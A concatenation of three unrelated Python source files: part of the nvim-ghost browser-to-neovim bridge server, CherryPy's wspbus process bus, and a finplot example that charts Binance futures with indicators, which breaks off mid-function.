"/": self._ghost_responder,
"/version": self._version_responder,
"/exit": self._exit_responder,
"/is_ghost_binary": self._sanity_check_responder,
}
responses_data = {
"/focus": self._focus_responder,
"/session-closed": self._session_closed_responder,
}
if path in responses_nodata:
responses_nodata[path]()
if path in responses_data:
responses_data[path](query)
def _ghost_responder(self):
"""
The actual part. The browser extension is calling us.
"""
if neovim_focused_address is None:
# There's no neovim instance to handle our request
return
# In f-strings, to insert literal {, we need to escape it using another {
# So {{ translates to a single literal {
payload = f"""\
{{
"ProtocolVersion": 1,
"WebSocketPort": {servers.websocket_server.port}
}}"""
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.end_headers()
self.wfile.write(payload.encode("utf-8"))
# NOTE: We didn't use _respond because it sets Content-Type to
# text/plain, but the protocol mentions that the Content-Type should be
# application/json
def _version_responder(self):
"""
Somebody wants to check the version of the running server
"""
self._respond(BUILD_VERSION)
def _exit_responder(self):
"""
We have been told to exit
"""
self._respond("Exiting...")
print(time.strftime("[%H:%M:%S]:"), "Received /exit")
global stop_servers
stop_servers()
def _sanity_check_responder(self):
"""
Somebody wants to check if this is _actually_ the correct server
"""
self._respond("True")
def _focus_responder(self, query_string):
"""
A neovim instance is reporting that it has gained focus
:param query_string str: The query part of the URL
"""
_, address = urllib.parse.parse_qsl(query_string)[0]
self._respond(address)
global neovim_focused_address
if neovim_focused_address != address:
neovim_focused_address = address
print(time.strftime("[%H:%M:%S]:"), f"Focus {address}")
def _session_closed_responder(self, query_string):
"""
A neovim instance is reporting that it has been closed
:param query_string str: The query part of the URL
"""
_, address = urllib.parse.parse_qsl(query_string)[0]
self._respond(address)
print(time.strftime("[%H:%M:%S]:"), f"{address} session closed")
global WEBSOCKET_PER_NEOVIM_ADDRESS
if WEBSOCKET_PER_NEOVIM_ADDRESS.__contains__(address):
for websocket in WEBSOCKET_PER_NEOVIM_ADDRESS[address]:
websocket.close()
WEBSOCKET_PER_NEOVIM_ADDRESS.__delitem__(address)
global neovim_focused_address
if address == neovim_focused_address:
neovim_focused_address = None
def _respond(self, text):
"""
Send text response with Content-Type text/plain
:param text str: Text to send
"""
self.send_response(200)
self.send_header("Content-Type", "text/plain")
self.end_headers()
self.wfile.write(text.encode("utf-8"))
class GhostWebSocket(WebSocket):
# New message received
def handle(self):
# Log
print(time.strftime("[%H:%M:%S]:"), f"{self.address[1]} got", self.data)
# Extract the data
data = json.loads(self.data)
filetype = data["syntax"]
url = data["url"]
text = data["text"]
text_split = text.split("\n")
# Set the buffer text
neovim_handle = self.neovim_handle
buffer_handle = self.buffer_handle
neovim_handle.api.buf_set_lines(buffer_handle, 0, -1, 0, text_split)
# Don't handle the next nvim_buf_lines_event until we're done
self.handle_neovim_notifications = False
# Save the text that we just set. So that, if a nvim_buf_lines_event
# wants to sent the exact same text, we can stop it.
self.last_set_text = text
if not self.handled_first_message:
# We hadn't handled the first message yet.
# i.e. this is the first message, and we have already handled it.
# So we _have_ handled the first message, you idiot.
self.handled_first_message = True
# Since this is the first message, it means we haven't set the
# filetype yet. So, let's set the filetype now.
neovim_handle.api.buf_set_option(buffer_handle, "filetype", filetype)
self._trigger_autocmds(url)
self.last_set_filetype = filetype
if not filetype == self.last_set_filetype:
# i.e. the filetype has changed in the browser
handle = neovim_handle
buffer = buffer_handle
currently_set_filetype = handle.api.buf_get_option(buffer, "filetype")
if self.last_set_filetype == currently_set_filetype:
# user hasn't set a custom filetype
neovim_handle.api.buf_set_option(buffer_handle, "filetype", filetype)
self.last_set_filetype = filetype
self._trigger_autocmds(url)
# New connection
def connected(self):
# Create and setup the buffer
self.neovim_address = neovim_focused_address
self.neovim_handle = get_neovim_handle()
self.buffer_handle = self.neovim_handle.api.create_buf(False, True)
self.neovim_handle.api.buf_set_option(self.buffer_handle, "bufhidden", "wipe")
self.neovim_handle.command(f"tabe | {self.buffer_handle.number}buffer")
self.handle_neovim_notifications = True
self._start_neovim_listener()
# Log
print(
time.strftime("[%H:%M:%S]:"),
"Connected",
":".join([str(_) for _ in self.address]),
"to",
self.neovim_address,
)
# Add it to the records
global WEBSOCKET_PER_NEOVIM_ADDRESS
if not WEBSOCKET_PER_NEOVIM_ADDRESS.__contains__(self.neovim_address):
WEBSOCKET_PER_NEOVIM_ADDRESS[self.neovim_address] = []
WEBSOCKET_PER_NEOVIM_ADDRESS[self.neovim_address].append(self)
# Since it's a new connection, we haven't handled the first message yet
self.handled_first_message = False
# Connection closed
def handle_close(self):
# Log
print(
time.strftime("[%H:%M:%S]:"),
":".join([str(_) for _ in self.address]),
"websocket closed",
)
# Delete buffer and stop event loop
self.neovim_handle.command(f"bdelete {self.buffer_handle.number}")
self.neovim_handle.close()
self.loop_neovim_handle.stop_loop()
self.loop_neovim_handle.close()
# Check and delete the associated records
global WEBSOCKET_PER_NEOVIM_ADDRESS
WEBSOCKET_PER_NEOVIM_ADDRESS[self.neovim_address].remove(self)
if len(WEBSOCKET_PER_NEOVIM_ADDRESS[self.neovim_address]) == 0:
WEBSOCKET_PER_NEOVIM_ADDRESS.__delitem__(self.neovim_address)
def _start_neovim_listener(self):
threading.Thread(target=self._neovim_listener, daemon=True).start()
def _neovim_listener(self):
self.loop_neovim_handle = get_neovim_handle()
self.loop_neovim_handle.subscribe("nvim_buf_lines_event")
self.loop_neovim_handle.subscribe("nvim_buf_detach_event")
self.loop_neovim_handle.api.buf_attach(self.buffer_handle, False, {})
self.loop_neovim_handle.run_loop(None, self._neovim_handler)
def _neovim_handler(self, *args):
if not self.handle_neovim_notifications:
# Resume handling notifications, because this notification has been
# triggered by the buffer changes we have done above.
self.handle_neovim_notifications = True
# Because this notification was caused by our changes, we are not
# interested in handling it. It is of zero significance to us.
return
# Fetch the event name
event = args[0]
if event == "nvim_buf_detach_event":
# Buffer has been closed by user. Close the connection.
self.close()
if event == "nvim_buf_lines_event":
# Buffer text has been changed by user.
# Get the buffer contents
handle = self.loop_neovim_handle
buffer_contents = handle.api.buf_get_lines(self.buffer_handle, 0, -1, False)
# Turn buffer_contents (a List) to a string
text = "\n".join(buffer_contents)
# Check if this is the same text we just set!
if self.last_set_text is not None:
if text == self.last_set_text:
# We are trying to send the text that we just set! Stop!
return
# Text has been changed by user.
# last_set_text is now outdated and invalid.
self.last_set_text = None
# Send the text
self._send_text(text)
def _send_text(self, text: str):
# NOTE: Just satisfying the protocol for now.
# I still don't know how to extract 'selections' from neovim
# Heck, I don't even know what this thing is supposed to do!
selections: List[Dict[str:int]] = []
selections.append({"start": 0, "end": 0})
# Construct and send the message
message = json.dumps({"text": text, "selections": selections})
self.send_message(message)
# Log
print(time.strftime("[%H:%M:%S]:"), f"{self.address[1]} sent", message)
def _trigger_autocmds(self, url: str):
self.neovim_handle.command(f"doau nvim_ghost_user_autocommands User {url}")
class GhostWebSocketServer(WebSocketServer):
# This is nessecary because the imported WebSocketServer does not store
# it's port number. Yes, I have seen the source code. It doesn't.
def __init__(self, host, port, websocketclass, **kwargs):
self.port = port
super().__init__(host, port, websocketclass, **kwargs)
class Server:
def __init__(self):
self.http_server = self._http_server()
self.websocket_server = self._websocket_server()
# Do not daemonize one of the threads. It will keep the binary running
# after the main thread has finished executing everything.
self.http_server_thread = threading.Thread(
target=self._http_server_serve_forever
)
self.websocket_server_thread = threading.Thread(
target=self.websocket_server.serve_forever,
daemon=True,
)
def _http_server(self):
if not _port_occupied(GHOST_PORT):
return HTTPServer((LOCALHOST, GHOST_PORT), GhostHTTPRequestHandler)
else:
sys.exit("Port Occupied")
def _http_server_serve_forever(self):
while True:
self.http_server.handle_request()
def _websocket_server(self):
while True:
random_port = random.randint(9000, 65535)
if not _port_occupied(random_port):
return GhostWebSocketServer(LOCALHOST, random_port, GhostWebSocket)
WEBSOCKET_PER_NEOVIM_ADDRESS: Dict[str, List[GhostWebSocket]] = {}
argparser = ArgParser()
argparser.parse_args()
# Start servers
exit_if_server_already_running()
servers = Server()
servers.http_server_thread.start()
servers.websocket_server_thread.start()
if LOGGING_ENABLED:
sys.stdout = open("stdout.log", "w", buffering=1)
sys.stderr = open("stderr.log", "w", buffering=1)
print(time.strftime("%A, %d %B %Y, %H:%M:%S"))
print(f"$NVIM_LISTEN_ADDRESS: {neovim_focused_address}")
print(f"binary {BUILD_VERSION}")
print("Servers started")
if neovim_focused_address is not None:
with pynvim.attach("socket", path=neovim_focused_address) as nvim_handle:
if not SUPER_QUIET:
nvim_handle.command("echom '[nvim-ghost] Servers started'")
store_port()
def stop_servers():
os.remove(TEMP_FILEPATH) # Remove port
print("Exiting...")
sys.exit()
def _signal_handler(_signal, _):
_signal_name = signal.Signals(_signal).name
print(time.strftime("[%H:%M:%S]:"), f"Caught: {_signal_name}")
if _signal in (signal.SIGINT, signal.SIGTERM):
stop_servers()
signal.signal(signal.SIGINT, _signal_handler)
signal.signal(signal.SIGTERM, _signal_handler)
# vim: et ts=4 sw=4 sts=4
|
wspbus.py
|
r"""An implementation of the Web Site Process Bus.
This module is completely standalone, depending only on the stdlib.
Web Site Process Bus
--------------------
A Bus object is used to contain and manage site-wide behavior:
daemonization, HTTP server start/stop, process reload, signal handling,
drop privileges, PID file management, logging for all of these,
and many more.
In addition, a Bus object provides a place for each web framework
to register code that runs in response to site-wide events (like
process start and stop), or which controls or otherwise interacts with
the site-wide components mentioned above. For example, a framework which
uses file-based templates would add known template filenames to an
autoreload component.
Ideally, a Bus object will be flexible enough to be useful in a variety
of invocation scenarios:
1. The deployer starts a site from the command line via a
framework-neutral deployment script; applications from multiple frameworks
are mixed in a single site. Command-line arguments and configuration
files are used to define site-wide components such as the HTTP server,
WSGI component graph, autoreload behavior, signal handling, etc.
2. The deployer starts a site via some other process, such as Apache;
applications from multiple frameworks are mixed in a single site.
Autoreload and signal handling (from Python at least) are disabled.
3. The deployer starts a site via a framework-specific mechanism;
for example, when running tests, exploring tutorials, or deploying
single applications from a single framework. The framework controls
which site-wide components are enabled as it sees fit.
The Bus object in this package uses topic-based publish-subscribe
messaging to accomplish all this. A few topic channels are built in
('start', 'stop', 'exit', 'graceful', 'log', and 'main'). Frameworks and
site containers are free to define their own. If a message is sent to a
channel that has not been defined or has no listeners, there is no effect.
In general, there should only ever be a single Bus object per process.
Frameworks and site containers share a single Bus object by publishing
messages and subscribing listeners.
The Bus object works as a finite state machine which models the current
state of the process. Bus methods move it from one state to another;
those methods then publish to subscribed listeners on the channel for
the new state.::
O
|
V
STOPPING --> STOPPED --> EXITING -> X
A A |
| \___ |
| \ |
| V V
STARTED <-- STARTING
"""
import atexit
try:
import ctypes
except ImportError:
"""Google AppEngine is shipped without ctypes
:seealso: http://stackoverflow.com/a/6523777/70170
"""
ctypes = None
import operator
import os
import sys
import threading
import time
import traceback as _traceback
import warnings
import subprocess
import functools
import six
# Here I save the value of os.getcwd(), which, if I am imported early enough,
# will be the directory from which the startup script was run. This is needed
# by _do_execv(), to change back to the original directory before execv()ing a
# new process. This is a defense against the application having changed the
# current working directory (which could make sys.executable "not found" if
# sys.executable is a relative-path, and/or cause other problems).
_startup_cwd = os.getcwd()
class ChannelFailures(Exception):
"""Exception raised during errors on Bus.publish()."""
delimiter = '\n'
def __init__(self, *args, **kwargs):
"""Initialize ChannelFailures errors wrapper."""
super(ChannelFailures, self).__init__(*args, **kwargs)
self._exceptions = list()
def handle_exception(self):
"""Append the current exception to self."""
self._exceptions.append(sys.exc_info()[1])
def get_instances(self):
"""Return a list of seen exception instances."""
return self._exceptions[:]
def __str__(self):
"""Render the list of errors, which happened in channel."""
exception_strings = map(repr, self.get_instances())
return self.delimiter.join(exception_strings)
__repr__ = __str__
def __bool__(self):
"""Determine whether any error happened in channel."""
return bool(self._exceptions)
__nonzero__ = __bool__
# Use a flag to indicate the state of the bus.
class _StateEnum(object):
class State(object):
name = None
def __repr__(self):
return 'states.%s' % self.name
def __setattr__(self, key, value):
if isinstance(value, self.State):
value.name = key
object.__setattr__(self, key, value)
states = _StateEnum()
states.STOPPED = states.State()
states.STARTING = states.State()
states.STARTED = states.State()
states.STOPPING = states.State()
states.EXITING = states.State()
try:
import fcntl
except ImportError:
max_files = 0
else:
try:
max_files = os.sysconf('SC_OPEN_MAX')
except AttributeError:
max_files = 1024
class Bus(object):
"""Process state-machine and messenger for HTTP site deployment.
All listeners for a given channel are guaranteed to be called even
if others at the same channel fail. Each failure is logged, but
execution proceeds on to the next listener. The only way to stop all
processing from inside a listener is to raise SystemExit and stop the
whole server.
"""
states = states
state = states.STOPPED
execv = False
max_cloexec_files = max_files
def __init__(self):
"""Initialize pub/sub bus."""
self.execv = False
self.state = states.STOPPED
channels = 'start', 'stop', 'exit', 'graceful', 'log', 'main'
self.listeners = dict(
(channel, set())
for channel in channels
)
self._priorities = {}
def subscribe(self, channel, callback=None, priority=None):
"""Add the given callback at the given channel (if not present).
If callback is None, return a partial suitable for decorating
the callback.
"""
if callback is None:
return functools.partial(
self.subscribe,
channel,
priority=priority,
)
ch_listeners = self.listeners.setdefault(channel, set())
ch_listeners.add(callback)
if priority is None:
priority = getattr(callback, 'priority', 50)
self._priorities[(channel, callback)] = priority
def unsubscribe(self, channel, callback):
"""Discard the given callback (if present)."""
listeners = self.listeners.get(channel)
if listeners and callback in listeners:
listeners.discard(callback)
del self._priorities[(channel, callback)]
def publish(self, channel, *args, **kwargs):
"""Return output of all subscribers for the given channel."""
if channel not in self.listeners:
return []
exc = ChannelFailures()
output = []
raw_items = (
(self._priorities[(channel, listener)], listener)
for listener in self.listeners[channel]
)
items = sorted(raw_items, key=operator.itemgetter(0))
for priority, listener in items:
try:
output.append(listener(*args, **kwargs))
except KeyboardInterrupt:
raise
except SystemExit:
e = sys.exc_info()[1]
# If we have previous errors ensure the exit code is non-zero
if exc and e.code == 0:
e.code = 1
raise
except Exception:
exc.handle_exception()
if channel == 'log':
# Assume any further messages to 'log' will fail.
pass
else:
self.log('Error in %r listener %r' % (channel, listener),
level=40, traceback=True)
if exc:
raise exc
return output
def _clean_exit(self):
"""Assert that the Bus is not running in atexit handler callback."""
if self.state != states.EXITING:
warnings.warn(
'The main thread is exiting, but the Bus is in the %r state; '
'shutting it down automatically now. You must either call '
'bus.block() after start(), or call bus.exit() before the '
'main thread exits.' % self.state, RuntimeWarning)
self.exit()
def start(self):
"""Start all services."""
atexit.register(self._clean_exit)
self.state = states.STARTING
self.log('Bus STARTING')
try:
self.publish('start')
self.state = states.STARTED
self.log('Bus STARTED')
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
self.log('Shutting down due to error in start listener:',
level=40, traceback=True)
e_info = sys.exc_info()[1]
try:
self.exit()
except Exception:
# Any stop/exit errors will be logged inside publish().
pass
# Re-raise the original error
raise e_info
def exit(self):
"""Stop all services and prepare to exit the process."""
exitstate = self.state
EX_SOFTWARE = 70
try:
self.stop()
self.state = states.EXITING
self.log('Bus EXITING')
self.publish('exit')
# This isn't strictly necessary, but it's better than seeing
# "Waiting for child threads to terminate..." and then nothing.
self.log('Bus EXITED')
except Exception:
# This method is often called asynchronously (whether thread,
# signal handler, console handler, or atexit handler), so we
# can't just let exceptions propagate out unhandled.
# Assume it's been logged and just die.
os._exit(EX_SOFTWARE)
if exitstate == states.STARTING:
# exit() was called before start() finished, possibly due to
# Ctrl-C because a start listener got stuck. In this case,
# we could get stuck in a loop where Ctrl-C never exits the
# process, so we just call os.exit here.
os._exit(EX_SOFTWARE)
def restart(self):
"""Restart the process (may close connections).
This method does not restart the process from the calling thread;
instead, it stops the bus and asks the main thread to call execv.
"""
self.execv = True
self.exit()
def graceful(self):
"""Advise all services to reload."""
self.log('Bus graceful')
self.publish('graceful')
def block(self, interval=0.1):
"""Wait for the EXITING state, KeyboardInterrupt or SystemExit.
This function is intended to be called only by the main thread.
After waiting for the EXITING state, it also waits for all threads
to terminate, and then calls os.execv if self.execv is True. This
design allows another thread to call bus.restart, yet have the main
thread perform the actual execv call (required on some platforms).
"""
try:
self.wait(states.EXITING, interval=interval, channel='main')
except (KeyboardInterrupt, IOError):
# The time.sleep call might raise
# "IOError: [Errno 4] Interrupted function call" on KBInt.
self.log('Keyboard Interrupt: shutting down bus')
self.exit()
except SystemExit:
self.log('SystemExit raised: shutting down bus')
self.exit()
raise
# Waiting for ALL child threads to finish is necessary on OS X.
# See https://github.com/cherrypy/cherrypy/issues/581.
# It's also good to let them all shut down before allowing
# the main thread to call atexit handlers.
# See https://github.com/cherrypy/cherrypy/issues/751.
self.log('Waiting for child threads to terminate...')
for t in threading.enumerate():
# Validate the we're not trying to join the MainThread
# that will cause a deadlock and the case exist when
# implemented as a windows service and in any other case
# that another thread executes cherrypy.engine.exit()
if (
t != threading.currentThread() and
not isinstance(t, threading._MainThread) and
# Note that any dummy (external) threads are
# always daemonic.
not t.daemon
):
self.log('Waiting for thread %s.' % t.getName())
t.join()
if self.execv:
self._do_execv()
def wait(self, state, interval=0.1, channel=None):
"""Poll for the given state(s) at intervals; publish to channel."""
if isinstance(state, (tuple, list)):
states = state
else:
states = [state]
while self.state not in states:
time.sleep(interval)
self.publish(channel)
def _do_execv(self):
"""Re-execute the current process.
This must be called from the main thread, because certain platforms
(OS X) don't allow execv to be called in a child thread very well.
"""
try:
args = self._get_true_argv()
except NotImplementedError:
"""It's probably win32 or GAE"""
args = [sys.executable] + self._get_interpreter_argv() + sys.argv
self.log('Re-spawning %s' % ' '.join(args))
self._extend_pythonpath(os.environ)
if sys.platform[:4] == 'java':
from _systemrestart import SystemRestart
raise SystemRestart
else:
if sys.platform == 'win32':
args = ['"%s"' % arg for arg in args]
os.chdir(_startup_cwd)
if self.max_cloexec_files:
self._set_cloexec()
os.execv(sys.executable, args)
@staticmethod
def _get_interpreter_argv():
"""Retrieve current Python interpreter's arguments.
Returns empty tuple in case of frozen mode, uses built-in arguments
reproduction function otherwise.
Frozen mode is possible for the app has been packaged into a binary
executable using py2exe. In this case the interpreter's arguments are
already built-in into that executable.
:seealso: https://github.com/cherrypy/cherrypy/issues/1526
Ref: https://pythonhosted.org/PyInstaller/runtime-information.html
"""
return ([]
if getattr(sys, 'frozen', False)
else subprocess._args_from_interpreter_flags())
@staticmethod
def _get_true_argv():
"""Retrieve all real arguments of the python interpreter.
...even those not listed in ``sys.argv``
:seealso: http://stackoverflow.com/a/28338254/595220
:seealso: http://stackoverflow.com/a/6683222/595220
:seealso: http://stackoverflow.com/a/28414807/595220
"""
try:
char_p = ctypes.c_char_p if six.PY2 else ctypes.c_wchar_p
argv = ctypes.POINTER(char_p)()
argc = ctypes.c_int()
ctypes.pythonapi.Py_GetArgcArgv(
ctypes.byref(argc),
ctypes.byref(argv),
)
_argv = argv[:argc.value]
# The code below is trying to correctly handle special cases.
# `-c`'s argument interpreted by Python itself becomes `-c` as
# well. Same applies to `-m`. This snippet is trying to survive
# at least the case with `-m`
# Ref: https://github.com/cherrypy/cherrypy/issues/1545
# Ref: python/cpython@418baf9
argv_len, is_command, is_module = len(_argv), False, False
try:
m_ind = _argv.index('-m')
if m_ind < argv_len - 1 and _argv[m_ind + 1] in ('-c', '-m'):
"""
In some older Python versions `-m`'s argument may be
substituted with `-c`, not `-m`
"""
is_module = True
except (IndexError, ValueError):
m_ind = None
try:
c_ind = _argv.index('-c')
if c_ind < argv_len - 1 and _argv[c_ind + 1] == '-c':
is_command = True
except (IndexError, ValueError):
c_ind = None
if is_module:
"""It's containing `-m -m` sequence of arguments"""
if is_command and c_ind < m_ind:
"""There's `-c -c` before `-m`"""
raise RuntimeError(
"Cannot reconstruct command from '-c'. Ref: "
'https://github.com/cherrypy/cherrypy/issues/1545')
# Survive module argument here
original_module = sys.argv[0]
if not os.access(original_module, os.R_OK):
"""There's no such module exist"""
raise AttributeError(
"{} doesn't seem to be a module "
'accessible by current user'.format(original_module))
del _argv[m_ind:m_ind + 2] # remove `-m -m`
# ... and substitute it with the original module path:
_argv.insert(m_ind, original_module)
elif is_command:
"""It's containing just `-c -c` sequence of arguments"""
raise RuntimeError(
"Cannot reconstruct command from '-c'. "
'Ref: https://github.com/cherrypy/cherrypy/issues/1545')
except AttributeError:
"""It looks Py_GetArgcArgv is completely absent in some environments
It is known, that there's no Py_GetArgcArgv in MS Windows and
``ctypes`` module is completely absent in Google AppEngine
:seealso: https://github.com/cherrypy/cherrypy/issues/1506
:seealso: https://github.com/cherrypy/cherrypy/issues/1512
:ref: http://bit.ly/2gK6bXK
"""
raise NotImplementedError
else:
return _argv
@staticmethod
def _extend_pythonpath(env):
"""Prepend current working dir to PATH environment variable if needed.
If sys.path[0] is an empty string, the interpreter was likely
invoked with -m and the effective path is about to change on
re-exec. Add the current directory to $PYTHONPATH to ensure
that the new process sees the same path.
This issue cannot be addressed in the general case because
Python cannot reliably reconstruct the
original command line (http://bugs.python.org/issue14208).
(This idea filched from tornado.autoreload)
"""
path_prefix = '.' + os.pathsep
existing_path = env.get('PYTHONPATH', '')
needs_patch = (
sys.path[0] == '' and
not existing_path.startswith(path_prefix)
)
if needs_patch:
env['PYTHONPATH'] = path_prefix + existing_path
def _set_cloexec(self):
"""Set the CLOEXEC flag on all open files (except stdin/out/err).
If self.max_cloexec_files is an integer (the default), then on
platforms which support it, it represents the max open files setting
for the operating system. This function will be called just before
the process is restarted via os.execv() to prevent open files
from persisting into the new process.
Set self.max_cloexec_files to 0 to disable this behavior.
"""
for fd in range(3, self.max_cloexec_files): # skip stdin/out/err
try:
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
except IOError:
continue
fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)
def stop(self):
"""Stop all services."""
self.state = states.STOPPING
self.log('Bus STOPPING')
self.publish('stop')
self.state = states.STOPPED
self.log('Bus STOPPED')
def start_with_callback(self, func, args=None, kwargs=None):
"""Start 'func' in a new thread T, then start self (and return T)."""
if args is None:
args = ()
if kwargs is None:
kwargs = {}
args = (func,) + args
def _callback(func, *a, **kw):
self.wait(states.STARTED)
func(*a, **kw)
t = threading.Thread(target=_callback, args=args, kwargs=kwargs)
t.setName('Bus Callback ' + t.getName())
t.start()
self.start()
return t
def log(self, msg='', level=20, traceback=False):
"""Log the given message. Append the last traceback if requested."""
if traceback:
msg += '\n' + ''.join(_traceback.format_exception(*sys.exc_info()))
self.publish('log', msg, level)
bus = Bus()
|
complicated.py
|
#!/usr/bin/env python3
'''A lengthy example that shows some more complex uses of finplot:
- control panel in PyQt
- varying indicators, intervals and layout
- toggle dark mode
- price line
- real-time updates via websocket
This example includes dipping in to the internals of finplot and
the underlying lib pyqtgraph, which is not part of the API per se,
and may thus change in the future. If so happens, this example
will be updated to reflect such changes.
Included is also some third-party libraries to make the example
more realistic.
'''
import finplot as fplt
from functools import lru_cache
import json
from math import nan
import pandas as pd
from PyQt5.QtWidgets import QComboBox, QCheckBox, QWidget
from pyqtgraph import QtGui
import pyqtgraph as pg
import requests
from time import time as now, sleep
from threading import Thread
import websocket
class BinanceFutureWebsocket:
def __init__(self):
self.url = 'wss://fstream.binance.com/stream'
self.symbol = None
self.interval = None
self.ws = None
self.df = None
def reconnect(self, symbol, interval, df):
'''Connect and subscribe, if not already done so.'''
self.df = df
if symbol.lower() == self.symbol and self.interval == interval:
return
self.symbol = symbol.lower()
self.interval = interval
self.thread_connect = Thread(target=self._thread_connect)
self.thread_connect.daemon = True
self.thread_connect.start()
def close(self, reset_symbol=True):
if reset_symbol:
self.symbol = None
if self.ws:
self.ws.close()
self.ws = None
def _thread_connect(self):
self.close(reset_symbol=False)
print('websocket connecting to %s...' % self.url)
self.ws = websocket.WebSocketApp(self.url, on_message=self.on_message, on_error=self.on_error)
self.thread_io = Thread(target=self.ws.run_forever)
self.thread_io.daemon = True
self.thread_io.start()
for _ in range(100):
if self.ws.sock and self.ws.sock.connected:
break
sleep(0.1)
else:
self.close()
raise websocket.WebSocketTimeoutException('websocket connection failed')
self.subscribe(self.symbol, self.interval)
print('websocket connected')
def subscribe(self, symbol, interval):
try:
data = '{"method":"SUBSCRIBE","params":["%s@kline_%s"],"id":1}' % (symbol, interval)
self.ws.send(data)
except Exception as e:
print('websocket subscribe error:', type(e), e)
raise e
def on_message(self, msg):
df = self.df
if df is None:
return
msg = json.loads(msg)
if 'stream' not in msg:
return
stream = msg['stream']
if '@kline_' in stream:
k = msg['data']['k']
t = k['t']
t0 = int(df.index[-2].timestamp()) * 1000
t1 = int(df.index[-1].timestamp()) * 1000
t2 = t1 + (t1-t0)
if t < t2:
# update last candle
i = df.index[-1]
df.loc[i, 'Close'] = float(k['c'])
df.loc[i, 'High'] = max(df.loc[i, 'High'], float(k['h']))
df.loc[i, 'Low'] = min(df.loc[i, 'Low'], float(k['l']))
df.loc[i, 'Volume'] = float(k['v'])
else:
# create a new candle
data = [t] + [float(k[i]) for i in ['o','c','h','l','v']]
candle = pd.DataFrame([data], columns='Time Open Close High Low Volume'.split()).astype({'Time':'datetime64[ms]'})
candle.set_index('Time', inplace=True)
self.df = df.append(candle)
def on_error(self, error):
print('websocket error: %s' % error)
def do_load_price_history(symbol, interval):
url = 'https://www.binance.com/fapi/v1/klines?symbol=%s&interval=%s&limit=%s' % (symbol, interval, 1000)
print('loading binance future %s %s' % (symbol, interval))
d = requests.get(url).json()
df = pd.DataFrame(d, columns='Time Open High Low Close Volume a b c d e f'.split())
df = df.astype({'Time':'datetime64[ms]', 'Open':float, 'High':float, 'Low':float, 'Close':float, 'Volume':float})
return df.set_index('Time')
@lru_cache(maxsize=5)
def cache_load_price_history(symbol, interval):
'''Stupid caching, but works sometimes.'''
return do_load_price_history(symbol, interval)
def load_price_history(symbol, interval):
'''Use memoized, and if too old simply load the data.'''
df = cache_load_price_history(symbol, interval)
# check if cache's newest candle is current
t0 = df.index[-2].timestamp()
t1 = df.index[-1].timestamp()
t2 = t1 + (t1 - t0)
if now() >= t2:
df = do_load_price_history(symbol, interval)
return df
def calc_parabolic_sar(df, af=0.2, steps=10):
up = True
sars = [nan] * len(df)
sar = ep_lo = df.Low.iloc[0]
ep = ep_hi = df.High.iloc[0]
aaf = af
aaf_step = aaf / steps
af = 0
for i,(hi,lo) in enumerate(zip(df.High, df.Low)):
# parabolic sar formula:
sar = sar + af * (ep - sar)
# handle new extreme points
if hi > ep_hi:
ep_hi = hi
if up:
ep = ep_hi
af = min(aaf, af+aaf_step)
elif lo < ep_lo:
ep_lo = lo
if not up:
ep = ep_lo
af = min(aaf, af+aaf_step)
# handle switch
if up:
if lo < sar:
up = not up
sar = ep_hi
ep = ep_lo = lo
af = 0
else:
if hi > sar:
up = not up
sar = ep_lo
ep = ep_hi = hi
af = 0
sars[i] = sar
df['sar'] = sars
return df['sar']
def calc_rsi(price, n=14, ax=None):
diff = price.diff().values
gains = diff
losses = -diff
gains[~(gains>0)] = 0.0
losses[~(losses>0)] = 1e-10 # we don't want divide by zero/NaN
m = (n-1) / n
ni = 1 / n
g = gains[n] = gains[:n].mean()
l = losses[n] = losses[:n].mean()
gains[:n] = losses[:n] = nan
for i,v in enumerate(gains[n:],n):
g = gains[i] = ni*v + m*g
for i,v in enumerate(losses[n:],n):
l = losses[i] = ni*v + m*l
rs = gains / losses
rsi = 100 - (100/(1+rs))
return rsi
def calc_stochastic_oscillator(df, n=14, m=3, smooth=3):
lo = df.Low.rolling(n).min()
hi = df.High.rolling(n).max()
k = 100 * (df.Close-lo) / (hi-lo)
d = k.rolling(m).mean()
return k, d
def calc_plot_data(df, indicators):
'''Returns data for all plots and for the price line.'''
price = df['Open Close High Low'.split()]
volume = df['Open Close Volume'.split()]
ma50 = ma200 = vema24 = sar = rsi = stoch = stoch_s = None
if 'few' in indicators or 'moar' in indicators:
ma50 = price.Close.rolling(50).mean()
ma200 = price.Close.rolling(200).mean()
vema24 = volume.Volume.ewm(span=24).mean()
if 'moar' in indicators:
sar = calc_parabolic_sar(df)
rsi = calc_rsi(df.Close)
stoch,stoch_s = calc_stochastic_oscillator(df)
plot_data = dict(price=price, volume=volume, ma50=ma50, ma200=ma200, vema24=vema24, sar=sar, rsi=rsi, \
stoch=stoch, stoch_s=stoch_s)
# for price line
last_close = price.iloc[-1].Close
last_col = fplt.candle_bull_color if last_close > price.iloc[-2].Close else fplt.candle_bear_color
price_data = dict(last_close=last_close, last_col=last_col)
return plot_data, price_data
def realtime_update_plot():
'''Called at regular intervals by a timer.'''
if ws.df is None:
return
# calculate the new plot data
indicators = ctrl_panel.indicators.currentText().lower()
data,price_data = calc_plot_data(ws.df, indicators)
# first update all data, then graphics (for zoom rigidity)
for k in data:
if data[k] is not None:
plots[k].update_data(data[k], gfx=False)
for k in data:
if data[k] is not None:
plots[k].update_gfx()
# place and color price line
ax.price_line.setPos(price_data['last_close'])
ax.price_line.pen.setColor(pg.mkColor(price_data['last_col']))
def change_asset(*args, **kwargs):
'''Resets and recalculates everything, and plots for the first time.'''
# save window zoom position before resetting
fplt._savewindata(fplt.windows[0])
symbol = ctrl_panel.symbol.currentText()
interval = ctrl_panel.interval.currentText()
ws.df = None
df = load_price_history(symbol, interval=interval)
ws.reconnect(symbol, interval, df)
# remove any previous plots
ax.reset()
axo.reset()
ax_rsi.reset()
# calculate plot data
indicators = ctrl_panel.indicators.currentText().lower()
data,price_data = calc_plot_data(df, indicators)
# some space for legend
ctrl_panel.move(100 if 'clean' in indicators else 200, 0)
# plot data
global plots
plots = {}
plots['price'] = fplt.candlestick_ochl(data['price'], ax=ax)
plots['volume'] = fplt.volume_ocv(data['volume'], ax=axo)
if data['ma50'] is not None:
plots['ma50'] = fplt.plot(data['ma50'], legend='MA-50', ax=ax)
plots['ma200'] = fplt.plot(data['ma200'], legend='MA-200', ax=ax)
plots['vema24'] = fplt.plot(data['vema24'], color=4, legend='V-EMA-24', ax=axo)
if data['rsi'] is not None:
ax.set_visible(xaxis=False)
ax_rsi.show()
